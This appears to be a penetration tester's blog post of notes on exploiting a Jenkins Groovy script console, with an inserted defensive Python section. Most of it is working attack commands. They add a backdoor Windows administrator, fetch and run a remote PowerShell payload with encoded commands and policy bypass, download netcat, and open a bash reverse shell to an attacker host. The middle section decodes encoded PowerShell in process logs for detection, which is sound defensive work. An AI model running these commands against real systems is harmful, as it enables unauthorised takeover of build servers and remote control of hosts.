
Hello all,

These posts will be small technical notes about abusing/exploiting something. Just so I don't forget =)

During the last real-world penetration test, Jenkins was found. It was installed on Windows, and my goal was to receive a reverse shell and avoid possible AV detection.

The part about how I gained access to Jenkins is not here, only small technical notes =)

The part about the PowerShell payload is also not described here.


1) Add a Windows user with administrator rights. I know you think it is simple, and it is true =)

// create the local user (the original note had /delete here, which contradicts the step)
def addUser = "cmd /c net user username SECUREPASSWORD /add".execute()
println "${addUser.text}"

// put the new user into the local Administrators group
def addAdmin = "cmd /c net localgroup administrators username /add".execute()
println "${addAdmin.text}"

Creating a user and adding it to the Administrators group are not stealthy actions, but I put it here for the record.


2) PowerShell execution in a Groovy script

PS command: iex (New-Object Net.WebClient).DownloadString('https://HOST/payload')

Encode: echo "iex (New-Object Net.WebClient).DownloadString('https://HOST/payload')" | iconv --to-code UTF-16LE | base64 -w 0


String to execute: cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc BASE64string

Groovy: def process = "cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc aQBlAHgAIAAoA...A".execute()
        println "${process.text}"


File download: powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://HOST/nc64.exe', 'C:\Jenkins\nc64.exe') }"

Encode: echo "& { (New-Object Net.WebClient).DownloadFile('https://HOST/nc64.exe', 'C:\Jenkins\nc64.exe') }" | iconv --to-code UTF-16LE | base64 -w 0

Groovy: def process = "cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc Base64String".execute()
        println "${process.text}"
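From the defender's side, the encoding step above is exactly what has to be reversed when a Jenkins-spawned `cmd.exe /c PowerShell.exe ... -Enc` shows up in process-creation logs (Sysmon Event ID 1, Windows 4688 with command-line logging, or the Jenkins console output itself). The following Python is an added example and not code from the original post: it mirrors the `iconv --to-code UTF-16LE | base64 -w 0` transform, decodes `-EncodedCommand` arguments found in command lines, and flags an ExecutionPolicy bypass. The log lines and the decoded script are constructed samples.

```python
"""Decode base64/UTF-16LE PowerShell -EncodedCommand values from process command lines.

Added example (not part of the original post). Sample log lines below are constructed.
"""
import base64
import re
from typing import List, Optional, Tuple

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# Requiring whitespace right after the flag keeps -Exec / -ExecutionPolicy from matching.
ENC_FLAG = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)
EXEC_BYPASS = re.compile(r"-ex(?:ec|ecutionpolicy)?\s+bypass", re.IGNORECASE)


def encode_powershell(command: str) -> str:
    """Same transform as `iconv --to-code UTF-16LE | base64 -w 0` (without echo's newline)."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell(b64: str) -> str:
    """Reverse of encode_powershell; drops the trailing newline `echo` would have added."""
    return base64.b64decode(b64).decode("utf-16-le").rstrip("\r\n")


def decode_from_cmdline(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = ENC_FLAG.search(cmdline)
    if m is None:
        return None
    try:
        return decode_powershell(m.group(1))
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueError subclasses
        # Truncated log line or payload that is not really UTF-16LE: report instead of crashing.
        return "<undecodable encoded command>"


def scan_process_log(lines: List[str]) -> List[Tuple[str, str, bool]]:
    """For each line with an encoded command: (line, decoded script, bypass flag present)."""
    findings = []
    for line in lines:
        decoded = decode_from_cmdline(line)
        if decoded is not None:
            findings.append((line, decoded, bool(EXEC_BYPASS.search(line))))
    return findings


# Constructed sample lines in a "parent -> child command line" layout; the script is benign.
SAMPLE_LINES = [
    "java.exe -> cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc "
    + encode_powershell("Write-Host 'constructed sample'"),
    "explorer.exe -> notepad.exe C:\\Users\\builder\\notes.txt",
    "java.exe -> powershell.exe -NoProfile -Command Get-Date",
]

if __name__ == "__main__":
    for line, script, bypass in scan_process_log(SAMPLE_LINES):
        print(f"{line}\n  decoded : {script}\n  exec bypass: {bypass}")
```

A java.exe parent (the Jenkins service) spawning cmd.exe or powershell.exe is the relationship worth alerting on; the decoded script tells you whether it was a build step or something like the `iex (New-Object Net.WebClient).DownloadString(...)` pattern above.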


3) And a reverse shell for Jenkins on Linux =) Thank you pentestmonkey for the Java reverse shell.


r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/IPADDR/PORT;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])


P.S.: set a strong password on your Jenkins


Thank you for reading
